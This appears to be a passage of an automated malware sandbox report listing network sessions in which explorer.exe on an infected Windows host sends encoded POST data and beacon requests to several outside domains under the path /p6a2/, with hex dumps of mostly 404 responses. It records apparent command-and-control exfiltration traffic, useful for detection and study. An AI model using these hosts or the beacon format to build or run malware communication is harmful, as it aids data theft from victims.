                                                                                              Dec 27, 2022 10:55:10.096352100 CET201OUTGET /p6a2/?PJsOe=tRwStDBOqpxrJTuJxG0qdx4zeeLq0lB6PIjn8XuQC4/eCDjBGzFZ7gNi69QxogIVbIfegutMJNyvrWeKAaI2x4/UCc3VFVMIlw==&4u=XXw8ZRfd0 HTTP/1.1
                                                                                              Host: www.byfuture.biz
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:55:10.301558971 CET202INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 27 Dec 2022 09:55:10 GMT
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Request-Context: appId=cid-v1:ce9d7f2e-1df5-4b59-a003-2b983b7619ed
                                                                                              X-Builder-Tracking-Id: ba199f29b5a948a8a6421ccb62877c04
                                                                                              Cache-Tag: www.byfuture.biz
                                                                                              Server: Viewer


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              15192.168.2.449710166.88.175.13080C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:15.639133930 CET203OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.forumhtc.com
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.forumhtc.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.forumhtc.com/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 48 54 52 5a 71 64 47 71 63 30 6b 6b 61 65 76 39 32 6d 4b 4c 71 34 72 71 69 68 7a 61 41 2d 54 4d 64 6b 6b 36 62 47 56 36 28 51 39 37 4e 6d 65 4c 32 77 69 4e 61 50 51 5a 51 65 56 57 61 78 35 54 57 62 28 5f 31 46 74 71 46 39 43 59 53 4f 79 75 6c 74 6d 30 33 53 67 55 37 4d 28 30 50 52 28 35 59 42 69 56 65 35 41 78 54 39 69 56 36 70 62 43 43 70 79 55 49 52 46 68 28 43 79 79 28 44 36 36 63 68 51 38 55 42 46 52 57 41 34 30 39 61 63 66 52 79 42 71 7e 6d 48 59 34 61 37 7a 4d 43 4f 4f 50 5a 69 6d 76 69 4e 42 6a 65 67 49 32 4d 28 61 34 77 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=HTRZqdGqc0kkaev92mKLq4rqihzaA-TMdkk6bGV6(Q97NmeL2wiNaPQZQeVWax5TWb(_1FtqF9CYSOyultm03SgU7M(0PR(5YBiVe5AxT9iV6pbCCpyUIRFh(Cyy(D66chQ8UBFRWA409acfRyBq~mHY4a7zMCOOPZimviNBjegI2M(a4w).
                                                                                              Dec 27, 2022 10:55:15.847455978 CET204INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:55:16 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 37 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 59 cd 6f dc 44 14 bf f7 af 18 5c a1 7e c8 de cf 64 b3 d9 6c 56 40 28 14 a9 2d 95 5a 2a 55 08 a4 b1 3d 8e 47 b1 3d d6 78 bc d9 a5 ca 91 23 07 6e 48 c0 01 4e 5c 80 13 12 12 82 bf 86 4a e4 bf e0 cd ac 3f 66 6c ef 66 cb 89 8d 94 28 33 f3 de bc cf df 7b f3 76 fe d6 fb 1f 9f 3d 7f f9 f4 01 0a 45 1c 2d 6e cd cb 3f 04 fb 8b 5b 08 3e f3 98 08 8c bc 10 f3 8c 88 53 eb 93 e7 1f 38 53 ab d8 12 54 44 64 f1 6c 9d 09 12 a3 07 9c 33 3e ef 6f d6 34 d2 04 c7 e4 d4 e2 cc 65 22 b3 90 c7 12 41 12 60 94 30 9a f8 64 65 27 2c 60 51 c4 2e 2d d4 d7 2f dc 50 2d 29 b9 4c 19 17 1a dd 25 f5 45 78 ea 93 25 f5 88 a3 fe b1 11 4d a8 a0 38 72 32 0f 47 e4 74 68 a3 3c 23 5c fd 87 5d 58 48 58 29 70 26 d6 20 b0 12 4e 7e fa f7 d1 7b 38 23 e8 7e bf 5a 72 99 bf 46 af aa 7f e5 29 8f 45 8c cf d0 ed f1 78 7c 62 6c 04 a0 cb 0c 0d 0f d2 15 7a 41 b8 8f 13 6c 23 eb 21 89 96 44 50 0f a3 27 24 27 96 8d c2 72 c1 46 ef 72 90 d2 46 77 1e 53 8f b3 8c 05 02 bd c4 0f 09 bd 63 a3 0c 27 99 03 42 d3 c0 bc 22 c6 fc 9c 26 33 34 30 97 53 ec fb 34 39 87 75 34 1a c0 f5 f2 97 79 e2 92 71 df 71 39 c1 17 33 a4 fe 38 72 a5 3e 73 55 69 12 0e 4d 75 cb 2b 87 92 f1 a0 79 b3 d4 d9 c9 e8 17 64 86 46 d3 e6 a5 6a f3 92 d0 f3 10 ec 72 38 68 08 1d d1 84 38 61 b1 3b 1e e9 c4 9a 34 a3 6e e3 1f 8c a6 53 8f b4 ed 5f 5d 77 d0 bc ae b2 d1 44 ea d1 6d 56 b5 d5 dc d4 54 1c b6 54 74 c1 8a 10 5b 10 cc 82 c5 e0 7c 60 90 b1 88 fa e8 36 21 9a 78 9a 42 e3 5e 96 bb 21 e4 13 38 6c 4b 64 75 29 57 ba 61 bb 88 a5 a1 0d cd f5 8b b7 f8 d5 b0 bc 0c 70 5d 61 b8 6e 87 91 5d 16 75 c6 10 76 5d de f0 5b ce 33 99 35 10 fd a9 c9 50 90 95 70 7c e2 31 8e 05 65 10 db 39 e0 00 97 c1 b1 f3 9c a3 72 77 86 7c b0 3c e9 16 a2 3b 72 a6 13 f9 63 f2 f6 0a e9 52 00 21 41 78 bd 59 9b 0f cf 42 b6 24 0d ad f6 91 bd 66 d1 53 11 4f 24 2e 9a a2 b9 d8 bb 38 e7 0c 14 07 58 09 a6 9e eb b9 ba 08 55 6a f6 88 17 32 24 24 88 35 22 47 01 1f 84 df 60 f0 f6 0e ca 94 37 e9 aa a4 18 b6 1c 2d b5 0d 00 88 67 08 e7 82 99 f6 d2 22 64 7a a8 dd 28 a3 c7 48 eb 61 ef e0 d0 24 ad 75 75 4a 20 0d 8e e4 4f e3 98 ca ab 16 d0 15 e9 c6 21 7b f2 6c 86 c6 9d d1 19 e0 98 46 eb 19 3a 63 09 e4 22 ce 00 85 1f 51 97 6c e2 0b 3d 66 80 ff 36 7a 4c 92 88 d9 70 26 e7 94 70 1b c5 b0 9c a5 58 c7 94 ab 5b 0d cb 4b fb 2d d0 0e 2b 6e 81 15 6d b9 8e 06 28 36 8f f0 9a e5 42 2f 37 3d b0 89 13 fb ce b8 db bf 23 dd d8 5a 60 15 54 c7 dd 54 47 dd 54 9f 7a 60 9b ec f3 53 ab a0 b6 3e 6b 90 83 f7 31 00 77 44 02 d1 95 11 3d 2f 22 98 07 74 d5 44 31 b9 3c 03 44 0c bb a8 de 89 89 4f 31 62 49 b4 46 99 c7 09 49 50 65 65 9c f8 e8 6e 4c 13 80 83 ba 9c 23 70 f3 d1 61 ba ba d7 3c 87 57 cd 73 93 c9 91 3c f7 aa 3e 29 03 b2 b2 a9 6d 54 eb 72 b9 69 34 49 d2 99 4e 72 a3 b6 b9 e1 c8 07 2b 8f a4 12 bd d0 47 49 c0 0c 87 92 6a cb cc f9 0d 9e 3b 82 a5 50 39 8d 72 ad f9 b5 26 ee c5 24 cb f0 39 31 99 d4 e9 db 02 f1 4d a6 18 15 c9 f7 35 9c 94 da 34 8a d7 00 25 ac 89 ba 66 36 b7 ca 5f 0d 04 6d 00 29 b8 83 86 8e 0c 21 a7 4c 5a e8 8f ba 72 5d 9a c2 e1 b2 57 d8 7e 52 5d d7 4a ef 76 76 97 59 5d b6 61 d6 eb bf 7e f9 e7 cf 5f af bf fd f2 fa 8f af 2d 3d 2c b5 0c af 1c 05 91 e1 37 0c dd 99 0a d2 84 aa 02 e0 88 9e 43 e1 f2 a0 91 d5 8b 87 dc af 30 2e e8 ec e4 36 0a 83 97 5a fe db 81 cc 0d 10 6c db 53 2f 27 c7 c7 c7 5d 69 d8 d3
                                                                                              Data Ascii: 7eeYoD\~dlV@(-Z*U=G=x#nHN\J?flf(3{v=E-n?[>S8STDdl3>o4e"A`0de',`Q.-/P-)L%Ex%M8r2Gth<#\]XHX)p& N~{8#~ZrF)Ex|blzAl#!DP'$'rFrFwSc'B"&340S49u4yqq938r>sUiMu+ydFjr8h8a;4nS_]wDmVTTt[|`6!xB^!8lKdu)Wap]an]uv][35Pp|1e9rw|<;rcR!AxYB$fSO$.8XUj2$$5"G`7-g"dz(Ha$uuJ O!{lF:c"Ql=f6zLp&pX[K-+nm(6B/7=#Z`TTGTz`S>k1wD=/"tD1<DO1bIFIPeenL#pa<Ws<>)mTri4INr+GIj;P9r&$91M54%f6_m)!LZr]W~R]JvvY]a~_-=,7C0.6ZlS/']i
                                                                                              Dec 27, 2022 10:55:15.847498894 CET205INData Raw: 42 2b 03 0c 84 e6 b9 ad b5 de 32 75 b9 ac 1d 5d 46 86 99 65 ed 38 80 1f 93 4b 59 62 9c 55 59 64 2a fa ee 24 d0 24 95 30 dc 95 51 46 c9 d8 8b 0b 62 d1 8d 8c 74 57 76 75 67 3e cd d2 08 43 cd a1 89 ca 18 37 62 de 85 a9 ac c4 b5 ad b8 e2 b2 95 ec a2
                                                                                              Data Ascii: B+2u]Fe8KYbUYd*$$0QFbtWvug>C7bU_e&Zm$uA5z]J:F4k(`|h15WIaT2p6]v>#\~Ko%c|=[pS8d3x!


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              16192.168.2.449711166.88.175.13080C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:18.333301067 CET206OUTGET /p6a2/?4u=XXw8ZRfd0&PJsOe=KR55po+9d10KX8Xj90KZyobZiDa/RtTgSn49Skh//ClUMGayigisS5MQTeINbAsCVfjq5Ep4Iv+TWpG/o+Gu0gk7nNTNW0LRWQ== HTTP/1.1
                                                                                              Host: www.forumhtc.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:55:18.546303034 CET207INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:55:18 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20
                                                                                              Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold; }
                                                                                              Dec 27, 2022 10:55:18.546360016 CET208INData Raw: 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20
                                                                                              Data Ascii: abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color: #868686; cursor: pointer; } a:hover{ text-dec
                                                                                              Dec 27, 2022 10:55:18.546401024 CET210INData Raw: 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 20 2e 6d 65
                                                                                              Data Ascii: .exception { margin-top: 20px; } .exception .message{ padding: 12px; border: 1px solid #ddd; border-bottom: 0 none; line-height: 18px; font-size:16p
                                                                                              Dec 27, 2022 10:55:18.546433926 CET211INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e
                                                                                              Data Ascii: border-left: 1px solid #ddd; height: 18px; line-height: 18px; } .exception .source-code pre code{ color: #333; height: 100%; display: inline-block;
                                                                                              Dec 27, 2022 10:55:18.546464920 CET212INData Raw: 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72
                                                                                              Data Ascii: font-weight: bold; padding: 6px 0; } .exception-var table caption small{ font-weight: 300; display: inline-block; margin-left: 10px; color: #ccc; }
                                                                                              Dec 27, 2022 10:55:18.546504021 CET213INData Raw: 61 6d 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 6c 69 74 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 36 36 20 7d 20 20 2f 2a 20 61 20 6c 69 74 65 72 61 6c 20 76 61 6c 75 65 20 2a 2f 0a 20 20 20 20 20 20 20
                                                                                              Data Ascii: ame */ pre.prettyprint .lit { color: #066 } /* a literal value */ /* punctuation, lisp open bracket, lisp close bracket */ pre.prettyprint .pun, pre.prettyprint .opn, pre.prettyprint .clo { color: #660 } pre.pr


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              17192.168.2.449712185.224.170.8280C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:24.103687048 CET215OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.3658622bet.com
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.3658622bet.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.3658622bet.com/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 55 62 4b 68 74 71 55 43 4b 31 7e 49 4c 41 51 76 34 4b 70 78 6e 75 51 4b 44 77 49 76 68 6f 65 44 57 45 42 71 63 6c 71 4a 4c 42 48 53 4e 42 54 42 75 65 55 49 37 55 33 62 6c 72 52 7a 44 30 4d 32 69 42 38 74 78 4a 74 4f 45 6f 32 4d 34 6c 68 4c 38 41 71 6e 4d 4d 4f 6f 33 4a 53 66 64 36 48 67 33 6b 45 6f 4b 31 41 36 72 32 55 30 37 72 64 30 7a 4e 45 78 56 58 30 65 28 4f 4e 61 6c 61 55 66 39 4d 47 5f 7a 76 59 59 33 36 57 6e 42 38 4e 55 41 77 41 58 74 7a 68 75 55 44 74 65 73 67 53 66 51 61 42 59 42 39 33 75 61 4c 57 62 7a 51 36 57 64 51 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=UbKhtqUCK1~ILAQv4KpxnuQKDwIvhoeDWEBqclqJLBHSNBTBueUI7U3blrRzD0M2iB8txJtOEo2M4lhL8AqnMMOo3JSfd6Hg3kEoK1A6r2U07rd0zNExVX0e(ONalaUf9MG_zvYY36WnB8NUAwAXtzhuUDtesgSfQaBYB93uaLWbzQ6WdQ).
                                                                                              Dec 27, 2022 10:55:24.318321943 CET215INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:55:24 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 146
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              18192.168.2.449713185.224.170.8280C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:26.850188017 CET216OUTGET /p6a2/?PJsOe=ZZiBudAdKkOjfCQP3JltneA7CA4H+oDcc2F0cF2NCUrgNT/O3PII+zj7tY9WUUQehw4FhZlrF4CxwEcOrzTPe++T19aYNqzGtA==&4u=XXw8ZRfd0 HTTP/1.1
                                                                                              Host: www.3658622bet.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:55:27.067117929 CET216INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:55:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 146
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              19192.168.2.449714185.253.34.8180C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:55:32.263557911 CET217OUTPOST /p6a2/ HTTP/1.1
                                                                                              Host: www.bip39chain.info
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.bip39chain.info
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.bip39chain.info/p6a2/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 50 4a 73 4f 65 3d 74 73 77 6b 32 78 33 2d 6c 33 61 4f 50 42 7e 44 41 6b 73 49 41 77 68 75 68 71 6e 49 70 79 61 6f 72 72 51 63 6a 77 69 67 71 73 38 47 4a 48 43 78 58 30 64 31 6d 57 4f 79 45 41 4f 78 46 39 73 4e 61 64 4b 6b 54 70 45 54 4c 72 6e 53 6f 32 66 46 65 64 6f 36 42 4b 64 34 79 38 52 5a 51 64 56 57 53 76 68 2d 59 6d 46 2d 7a 6a 43 70 59 34 6d 32 63 4c 28 52 4d 6d 31 4b 4a 63 64 76 67 50 5a 69 4d 75 6d 43 68 61 4c 35 57 55 36 58 72 65 67 48 61 4c 36 74 57 64 36 6b 4c 70 55 6c 33 6f 39 2d 6d 35 51 70 6a 68 53 64 47 7a 52 34 7e 54 6a 51 69 41 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: PJsOe=tswk2x3-l3aOPB~DAksIAwhuhqnIpyaorrQcjwigqs8GJHCxX0d1mWOyEAOxF9sNadKkTpETLrnSo2fFedo6BKd4y8RZQdVWSvh-YmF-zjCpY4m2cL(RMm1KJcdvgPZiMumChaL5WU6XregHaL6tWd6kLpUl3o9-m5QpjhSdGzR4~TjQiA).
                                                                                              Dec 27, 2022 10:55:32.343802929 CET218INHTTP/1.1 404 Not Found
                                                                                              Server: ddos-guard
                                                                                              Connection: close
                                                                                              Set-Cookie: __ddg1_=izJ9rUOLO5ybP6Quw3s4; Domain=.bip39chain.info; HttpOnly; Path=/; Expires=Wed, 27-Dec-2023 09:55:32 GMT
                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              content-type: text/html
                                                                                              date: Tue, 27 Dec 2022 09:55:32 GMT
                                                                                              vary: User-Agent, Accept-Encoding
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              Content-Encoding: gzip
                                                                                              Transfer-Encoding: chunked
                                                                                              Data Raw: 32 43 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 54 6d 6b db 30 10 fe 3e d8 7f b8 ba 0c 56 88 63 3b 75 d8 b0 13 c3 d8 0b 1b 8c ad d0 c2 d8 47 d9 3a c7 a2 8a e4 49 97 38 d9 af df c9 79 6b 3b 0b 2c 59 3a dd 3d f7 3c e7 5b 5c 7d fa f9 f1 e1 f7 dd 67 e8 68 ad ab 57 8b 30 81 a7 bd c6 65 d4 a1 5a 75 54 64 69 fa 26 0a 47 28 24 4f 6b 24 01 46 ac d9 60 ab 70 e8 ad a3 08 1a 6b 08 0d 2d a3 41 49 ea 96 12 b7 aa c1 78 fc 98 80 32 8a 94 d0 b1 6f 04 bb cd 26 e0 3b a7 cc 63 4c 36 6e 15 2d 8d 8d 20 61 c7 a4 48 63 05 79 9a c3 0f 4b f0 c5 6e 8c 7c fd 6a 91 1c f6 17 c9 31 7e 6d e5 fe 84 b0 b1 da ba 02 ae f3 3c 2f 61 2d dc 4a 99 22 2d 5b 06 53 80 b1 6e 2d 34 64 79 bf 4b 66 69 bf 83 0f 8e 41 4c e0 2b ea 2d 92 6a 04 e3 10 c6 c7 1e 9d 6a 4b 78 92 6c 09 b5 68 1e 57 2e 00 88 4f 21 da b6 2d 03 0b 52 6d 5f f0 23 36 64 39 ba 32 f1 33 1f 51 05 e1 79 7a 81 70 47 b1 d0 6a 65 0a 68 98 2e 74 25 8c 1c 15 ef 53 46 78 4a 21 d6 d8 72 02 71 7e d8 ec ad 67 fe ac 29 44 ed ad de 10 96 40 b6 2f e0 36 44 19 4d e7 bc 62 6c 70 7c 16 5d 76 8a 78 e6 04 02 29 b1 57 7f b1 c8 e6 a3 5b ad 0c 9e 11 1f b6 46 9b e1 b0 55 5b 2d d9 29 ab c1 cc 67 41 fe d9 73 a7 71 00 11 88 2d 2f ae 19 13 7f 47 d5 33 fd ba 19 df ee ab 87 0e c1 a1 b7 1b d7 84 c5 9f 0d 7a 42 c9 95 b3 d1 92 c5 22 a8 91 01 f0 1d b0 06 a8 53 1e 58 99 2d ba ab 45 d2 b3 83 84 79 ac 8e ef 27 94 1e e4 b9 6e d3 30 9e 65 39 63 24 c7 f4 47 85 7a 21 a5 32 ab 22 94 42 80 09 a7 45 79 26 d8 a1 16 a4 b6 58 36 1a 85 63 0a a8 2b 2f 9a 9e fd 8d 99 c7 59 9a f1 ce 7f 95 72 